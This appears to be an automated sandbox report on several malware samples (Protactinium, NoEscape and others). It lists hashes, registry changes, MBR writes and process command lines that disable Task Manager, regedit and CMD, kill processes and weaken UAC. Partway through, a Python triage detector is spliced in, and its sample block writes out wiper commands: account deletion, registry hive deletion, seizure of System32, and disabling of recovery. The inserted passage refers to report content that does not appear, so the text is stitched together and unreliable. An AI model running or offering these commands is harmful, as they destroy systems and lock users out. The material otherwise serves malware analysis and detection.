C:\Users\Admin\Desktop\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE.txt
| MD5 | 7f0df170f9cea3f0bedc79894eb44bdf |
| SHA1 | 79a083f09bf614d80543d0c455bb27b031da8adf |
| SHA256 | 1d9712c98621bfda7f5247f6fd6ef93165db44710685438cf27a3fe5ecc1e738 |
| SHA512 | f3bb9891ae73a4ce45894b30edf753007505d6afce716d1589750721c143e8b483219196d8c6a39d56496e4b7f4b76e64fa85a5c1d000aa0bb9d1224889f9d1c |
memory/3316-1202-0x00007FFA7DA20000-0x00007FFA7E4E1000-memory.dmp
memory/3316-1203-0x000001C4A6AC0000-0x000001C4A6AD0000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
149s
Max time network
149s
Command Line
Signatures
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\SysWOW64\REG.exe | N/A |
Disables Task Manager via registry modification
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Protactinium (1).exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Protactinium (1).exe |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\REG.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\REG.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\REG.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Protactinium (1).exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Protactinium (1).exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
C:\Windows\SysWOW64\REG.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\REG.exe
REG add HKCU\SOFTWARE\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\REG.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f4 0x15c
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4004 -ip 4004
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4004 -s 1060
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | | udp |
Files
memory/4004-0-0x0000000000400000-0x000000000040E000-memory.dmp
memory/4004-1-0x0000000000400000-0x000000000040E000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:15
Platform
win7-20240221-en
Max time kernel
0s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Sulfoxide\Sulfoxide.exe
"C:\Users\Admin\AppData\Local\Temp\Sulfoxide\Sulfoxide.exe"
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
146s
Max time network
151s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 556 wrote to memory of 3976 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 556 wrote to memory of 3976 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 556 wrote to memory of 3976 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3976 -ip 3976
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 612
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 138.91.171.81:80 | | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.98.74.40.in-addr.arpa | udp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Hydromatic (1).exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Hydromatic (1).exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.109.69.13.in-addr.arpa | udp |
Files
memory/4476-0-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-1-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-2-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-3-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-4-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-5-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-6-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-7-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-8-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-9-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-10-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-11-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-12-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-13-0x0000000000160000-0x0000000000192000-memory.dmp
memory/4476-14-0x0000000000160000-0x0000000000192000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
151s
Max time network
156s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Monoxidex64.exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Monoxidex64.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral23
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240221-en
Max time kernel
141s
Max time network
123s
Command Line
Signatures
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\SysWOW64\REG.exe | N/A |
Disables Task Manager via registry modification
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Protactinium (1).exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Protactinium (1).exe |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\REG.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\REG.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\REG.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Protactinium (1).exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Protactinium (1).exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
C:\Windows\SysWOW64\REG.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\REG.exe
REG add HKCU\SOFTWARE\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\REG.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 564
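The NightMare process list earlier on this page (cmd.exe `/k` chains that delete the logged-on account, delete whole registry hives, take ownership of System32 and its drivers directory, grant the user full control over them and disable Windows RE) and the two Protactinium lists (REG add of DisableTaskMgr, DisableRegistryTools and DisableCMD, taskkill of taskmgr.exe) are exactly the command lines a triage script should flag without a human reading every row. The Python below is an added example, not tooling from the sandbox or from the sample's author: it parses a Processes block in the report's own layout (image path line, then its command line), splits cmd.exe `&&` chains so each chained command is scored separately, and matches each fragment against a small rule set. The rule names and regular expressions are this example's own assumptions; the sample block is constructed from lines shown in the lists above.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Detection rules applied to single command fragments. A cmd.exe "/k a && b && c"
# line is split on "&&" first, so every chained command is scored on its own.
# Rule names and regexes are this example's own assumptions, not sandbox signatures.
RULES = [
    ("account-deletion",            # net user <name> /delete
     re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+/delete\b", re.I)),
    ("registry-hive-deletion",      # "reg delete HKLM" with no subkey at all
     re.compile(r"\breg(?:\.exe)?\s+delete\s+(HK(?:CR|CU|LM|U|CC))\s*$", re.I)),
    ("admin-tool-disabled",         # DisableTaskMgr / DisableRegistryTools / DisableCMD = 1
     re.compile(r"\breg(?:\.exe)?\s+add\s+\S*policies\\\S*\s+/v\s+"
                r"(DisableTaskMgr|DisableRegistryTools|DisableCMD)\b.*\s/d\s+1\b", re.I)),
    ("system-file-takeown",         # ownership seized on anything under \Windows
     re.compile(r'\btakeown(?:\.exe)?"?\s+/f\s+"?([a-z]:\\windows\\[^\s"]*)', re.I)),
    ("system-acl-grant",            # full control granted on anything under \Windows
     re.compile(r'\bicacls(?:\.exe)?"?\s+"?([a-z]:\\windows\\[^\s"]*)"?\s+/grant\s+\S+:F\b', re.I)),
    ("winre-disabled",              # reagentc /disable removes the recovery environment
     re.compile(r'\breagentc(?:\.exe)?"?\s+/disable\b', re.I)),
    ("forced-process-kill",         # taskkill /f ... /im <image>
     re.compile(r'\btaskkill(?:\.exe)?"?\s+(?=.*?/f\b).*?/im\s+(\S+)', re.I)),
]


@dataclass(frozen=True)
class Finding:
    image: str    # executing image, as listed in the report
    tag: str      # rule name from RULES
    detail: str   # captured hive / path / value name / killed image, else the fragment


def parse_processes(block: str) -> list[tuple[str, str]]:
    """Pair up a Processes block in the report's layout: image path line, then its command line."""
    lines = [ln.strip() for ln in block.splitlines() if ln.strip()]
    if len(lines) % 2:
        raise ValueError("Processes block must alternate image path / command line")
    return list(zip(lines[0::2], lines[1::2]))


def triage(block: str) -> list[Finding]:
    """Score every command fragment of every process against RULES."""
    findings: list[Finding] = []
    for image, cmdline in parse_processes(block):
        for frag in re.split(r"\s*&&\s*", cmdline):
            for tag, rx in RULES:
                m = rx.search(frag)
                if m:
                    findings.append(Finding(image, tag, m.group(1) if m.groups() else frag))
    return findings


def tag_counts(block: str) -> dict[str, int]:
    """How many fragments hit each rule: a quick severity picture for one report."""
    return dict(Counter(f.tag for f in triage(block)))


# Constructed sample: lines copied from the NightMare and Protactinium process
# lists above, in the report's image-line / command-line layout.
SAMPLE = r"""
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k net user %username% /delete && exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k reg delete HKLM && exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k reagentc.exe /disable && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k color 47 && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && Exit
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM fontdrvhost.exe /F
C:\Windows\SysWOW64\REG.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
"""

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"{f.tag:24} {f.image:36} {f.detail}")
```

Splitting on `&&` matters because the sandbox lists both the wrapping cmd.exe line and each child it spawned: scoring the chain as a whole would count the four takeown/icacls operations on System32 once, and scoring only children would miss `reg delete` and `net user`, which are recorded with the same interesting command line twice. A single `takeown` on `C:\Windows\System32` by an interactive user is already a strong indicator on its own; the combination with `reagentc /disable` and an account deletion is what turns this report into a wiper verdict rather than an administrator cleaning up.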
Network
Files
memory/1836-0-0x0000000000400000-0x000000000040E000-memory.dmp
memory/1836-1-0x0000000000400000-0x000000000040E000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
141s
Max time network
114s
Command Line
Signatures
Enumerates physical storage devices
Processes
C:\Users\Admin\AppData\Local\Temp\$1\1337\Frog.exe
"C:\Users\Admin\AppData\Local\Temp\$1\1337\Frog.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
memory/3720-0-0x0000000000990000-0x0000000000991000-memory.dmp
memory/3720-3-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-4-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-5-0x0000000000990000-0x0000000000991000-memory.dmp
memory/3720-6-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-7-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-8-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-9-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-10-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-11-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-12-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-13-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-14-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-15-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-16-0x0000000000400000-0x000000000064F000-memory.dmp
memory/3720-17-0x0000000000400000-0x000000000064F000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:16
Platform
win10v2004-20240226-en
Max time kernel
14s
Max time network
36s
Command Line
Signatures
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\winnt32.exe" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
| File opened for modification | C:\Users\Public\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoAdminLogon = "0" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DisableCAD = "1" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\noescape.png" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnt32.exe | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
| File opened for modification | C:\Windows\winnt32.exe | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\Mouse | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\Mouse\SwapMouseButtons = "1" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\Desktop | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\Desktop\AutoColorization = "1" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "117" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\UseDefaultTile = "1" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\NoEscape (1).exe"
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa39b4055 /state1:0x41c64e6d
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
